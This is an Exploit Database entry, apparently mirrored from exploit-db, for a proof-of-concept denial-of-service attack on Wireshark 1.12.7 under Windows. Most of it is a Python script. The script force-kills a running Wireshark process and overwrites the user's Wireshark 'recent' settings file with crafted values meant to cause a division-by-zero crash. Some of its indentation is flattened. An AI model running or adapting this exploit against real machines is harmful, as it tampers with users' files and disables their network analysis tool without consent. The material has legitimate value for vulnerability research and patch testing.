Wireshark 1.12.7 – Division by Zero Crash (PoC)

• Exploit Database
• 34 阅读

• 作者： spyk
  日期： 2015-09-18
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38240/

• # Exploit Title: Wireshark 1.12.7 Division by zero DOS PoC
  # Date: 02/09/2015
  # Exploit Author: spyk <spyk[dot]developpeur[at]gmail[dot]com> @SwanBeaujard
  # Vendor Homepage: https://www.wireshark.org/
  # Software Link: https://www.wireshark.org/download.html
  # Version: 1.12.7 
  # Tested on: Windows 7
  # Thanks to my professor @St0rn https://www.exploit-db.com/author/?a=8143
  
  import os
  import subprocess
  import getpass
  
  drive=os.getenv("systemdrive")
  user=getpass.getuser()
  path="%s\\Users\\%s\\AppData\\Roaming\\Wireshark\\recent" %(drive,user)
   
  def wiresharkIsPresent():
   
   ps=subprocess.check_output("tasklist")
   
   if "Wireshark.exe" in ps:
   
  return 1
   
   else:
   
  return 0
   
   
   
  def killWireshark():
   
   try:
   
  res=subprocess.check_output("taskkill /F /IM Wireshark.exe /T")
   
  return 1
   
   except:
   
  return 0
   
   
   
  if wiresharkIsPresent():
   
   if killWireshark():
   
  print "Wireshark is killed!"
   
  sploit="""
  # Recent settings file for Wireshark 1.12.7.
  #
  # This file is regenerated each time Wireshark is quit
  # and when changing configuration profile.
  # So be careful, if you want to make manual changes here.
   
   
  # Main Toolbar show (hide).
  # TRUE or FALSE (case-insensitive).
  gui.toolbar_main_show: TRUE
   
  # Filter Toolbar show (hide).
  # TRUE or FALSE (case-insensitive).
  gui.filter_toolbar_show: TRUE
   
  # Wireless Settings Toolbar show (hide).
  # TRUE or FALSE (case-insensitive).
  gui.wireless_toolbar_show: FALSE
   
  # Show (hide) old AirPcap driver warning dialog box.
  # TRUE or FALSE (case-insensitive).
  gui.airpcap_driver_check_show: TRUE
   
  # Packet list show (hide).
  # TRUE or FALSE (case-insensitive).
  gui.packet_list_show: TRUE
   
  # Tree view show (hide).
  # TRUE or FALSE (case-insensitive).
  gui.tree_view_show: TRUE
   
  # Byte view show (hide).
  # TRUE or FALSE (case-insensitive).
  gui.byte_view_show: TRUE
   
  # Statusbar show (hide).
  # TRUE or FALSE (case-insensitive).
  gui.statusbar_show: TRUE
   
  # Packet list colorize (hide).
  # TRUE or FALSE (case-insensitive).
  gui.packet_list_colorize: TRUE
   
  # Timestamp display format.
  # One of: RELATIVE, ABSOLUTE, ABSOLUTE_WITH_DATE, DELTA, DELTA_DIS, EPOCH, UTC, UTC_WITH_DATE
  gui.time_format: RELATIVE
   
  # Timestamp display precision.
  # One of: AUTO, SEC, DSEC, CSEC, MSEC, USEC, NSEC
  gui.time_precision: AUTO
   
  # Seconds display format.
  # One of: SECONDS, HOUR_MIN_SEC
  gui.seconds_format: SECONDS
   
  # Zoom level.
  # A decimal number.
  gui.zoom_level: -10
   
  # Bytes view.
  # A decimal number.
  gui.bytes_view: 0
   
  # Main window upper (or leftmost) pane size.
  # Decimal number.
  gui.geometry_main_upper_pane: 440
   
  # Main window middle pane size.
  # Decimal number.
  gui.geometry_main_lower_pane: 428
   
  # Packet list column pixel widths.
  # Each pair of strings consists of a column format and its pixel width.
  column.width: %m, 59, %t, 84, %s, 154, %d, 154, %p, 56, %L, 48, %i, 1285
   
   # Last directory navigated to in File Open dialog.
  gui.fileopen_remembered_dir: """+drive+"""\\Users\\"""+user+"""\\Documents\\
  """
  try:
  	f=open(path,"w")
  	f.write(sploit)
  	f.close()
  	print "Success!"
  except:
  	print "Fail :("